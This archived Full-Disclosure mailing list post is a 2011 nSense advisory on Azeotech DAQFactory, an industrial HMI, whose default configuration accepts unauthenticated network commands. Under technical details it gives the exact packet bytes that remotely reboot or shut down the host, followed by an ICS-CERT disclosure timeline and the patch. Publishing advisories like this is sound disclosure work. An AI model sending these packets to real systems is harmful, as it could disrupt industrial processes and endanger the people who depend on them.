[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[Full-disclosure] nSense-2011-004: Azeotech DAQFactory
- To: full-disclosure@xxxxxxxxxxxxxxxxx
- Subject: [Full-disclosure] nSense-2011-004: Azeotech DAQFactory
- From: Henri Lindberg <henri+fulldisclosure@xxxxxxxxx>
- Date: Wed, 12 Oct 2011 19:27:41 +0300
nSense Vulnerability Research Security Advisory NSENSE-2011-004
---------------------------------------------------------------
Affected Vendor: Azeotech
Affected Product: DAQFactory
Platform: Windows
Impact: Remote reboot/shutdown
Vendor response: Patch
CVE: None
Credit: Knud / nSense
Technical details
---------------------------------------------------------------
The default configuration allows network connections towards
the HMI without authentication. This allows an attacker on the
network to shut down the machine running the HMI software by
sending a packet as outlined below:
preamble:
"\x01\x00\x09\x00CPassword\x00"
reboot:
"\x01\x00\x0f\x00CCommandGeneric\x01\x00\x00\x00\x04\x00\x00\x00"
shutdown:
"\x01\x00\x0f\x00CCommandGeneric\x01\x00\x00\x00\x06\x00\x00\x00"
Timeline:
20110412 Contacted ICS-CERT
20110413 ICS-CERT acknowledges receipt of information
20110413 ICS-CERT creates ticket,# ICS-VU-240775
20110502 Vendor creates patch, releases advisory to customers
20110625 ICS-CERT releases advisory
20110727 Vendor responds, CVE assigned, patch 20110809
Solution
Install the latest version from the vendor:
http://www.azeotech.com/downloads.php
Links:
http://www.nsense.fi http://www.nsense.dk
$$s$$$$s. ,s$$$$s ,S$$$$$s. $$s$$$$s. ,s$$$$s ,S$$$$$s.
$$$ `$$$ ($$( $$$ `$$$ $$$ `$$$ ($$( $$$ `$$$
$$$ $$$ `^$$s. $$$$$$$$$ $$$ $$$ `^$$s. $$$$$$$$$
$$$ $$$ )$$) $$$ $$$ $$$ )$$) $$$
$$$ $$$ ^$$$$$$7 `7$$$$$P $$$ $$$ ^$$$$$$7 `7$$$$$P
D r i v e n b y t h e c h a l l e n g e _
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/